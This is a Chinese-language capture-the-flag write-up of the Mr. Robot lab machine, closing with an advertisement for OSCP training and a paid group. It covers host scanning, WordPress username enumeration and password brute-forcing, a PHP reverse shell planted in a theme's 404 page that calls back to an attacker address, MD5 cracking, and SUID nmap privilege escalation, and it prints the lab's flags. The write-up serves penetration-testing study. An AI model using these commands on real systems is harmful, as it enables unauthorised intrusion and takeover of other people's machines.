一、探测靶机IP（进行信息收集）

主机发现

arp-scan -l

nmap -sS -sV -T5 -p- 192.168.10.13 -A

二、进入网页

可以看到有三个命令但是都没有什么信息，但是这些视频很帅很帅，打完了还回去看了一遍

三、进行目录枚举

dirb http://192.168.10.13

爆了一个readme目录，robot.txt,还有wordpress登录界面，以及phpadmin

访问robots.txt发现有一个key-1-of-3.txt

再进行访问key-1-of-3.txt

073403c8a58a1f80d943455fb30724b9

还有fsocity.dic

访问后发现很多的像目录，用户，但是很多很多，也有像密码，先下载下来

nikto -h http://192.168.10.13

在登录界面发现可以通过用户名或电子邮件收到新密码链接，这时就可以通过不同的状态码来看有哪些用户名

四、爆破

抓包发送到测试器

导入fsocity.dic进行攻击

发现状态码为500的是Elliot，有四个不过都是大小写

知道用户名去爆破，但是太多了还有重复的，先进行去重，原本8万多行，太多了

awk '!seen[$0]++' 1.txt > pass.txt

再进行爆破，过滤200，发现只有ER28-0652重定向

去尝试登录，登录成功

五、反向shell+提权

经典文件上传

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.10.11/8888 0>&1'");?>

再访问,知道发生错误就会执行反向shell

192.168.10.13/wp-scan/404.php

记得开启监听

发现robot目录下有两个密码，key-2-of-3.txt无权限，password.raw-md5为c3fcd3d76192e4007dfb496cca67e13b

MD5解密https://hashes.com/en/decrypt/hash

abcdefghijklmnopqrstuvwxyz

得到了robot的密码，看看能不能切换用户，因为ssh服务是关闭的，别忘了要交互式终端

python -c "import pty;pty.spawn('/bin/bash')"

得到了key-2-of-3.txt,为822c73956184f694993bede3eb39f959

有密码尝试sudo提权失败，查看定时任务也没有发现什么

尝试suid提权

find / -perm -4000 -print 2>/dev/null

有nmap，尝试namp提权，但是由于用户不在sudo组里，如果在的话可以用这个方法

touch shell.sh
echo'os.execute("/bin/sh")' > shell.sh
sudo nmap --script=shell.sh

或者这个方法，某些旧版本 Nmap 的 Lua 解释器存在沙箱逃逸漏洞，可直接执行系统命令

nmap --script "os.execute('/bin/sh')" 192.168.10.13 #192.168.10.13是目标ip

即使没有sudo的权限还是可以通过namp提权

nmap --interactive
!sh

提权成功

第三个key 04787ddef27c3dee1ee161b21670b4e4

nmap --script "os.execute('/bin/sh')" 192.168.10.13 

END

oscp

有对红队工作感兴趣，或者有意报考oscp的师傅，可以考虑一下我们的培训课程，加我微信咨询，好处如下：

1.报考后课程随时可看，并且如果对考试没有信心，还可以留群跟第二批课程学习，不限次数时间，报考即是一辈子可看

2.200+台靶机及官方课程，lab靶机+域的内容团队泷老师和小羽老师会带大家全部过一遍，并且群内随时答疑，团队老师及群友都会积极解答，全天可答疑

3.目前可接受分期付款，无利息，最多分四个月，第一次付完即可观看视频

4.加入课程可享受工作推荐机会，优秀者可内推至红队

5.报考即送送官方文档中文版，以及kali命令详解中文版，纯人工翻译，版权为团队所有

知识星球

还可以加入我们的知识星球，包含cs二开，甲壳虫，红盟工具等，还有很多src挖掘资料包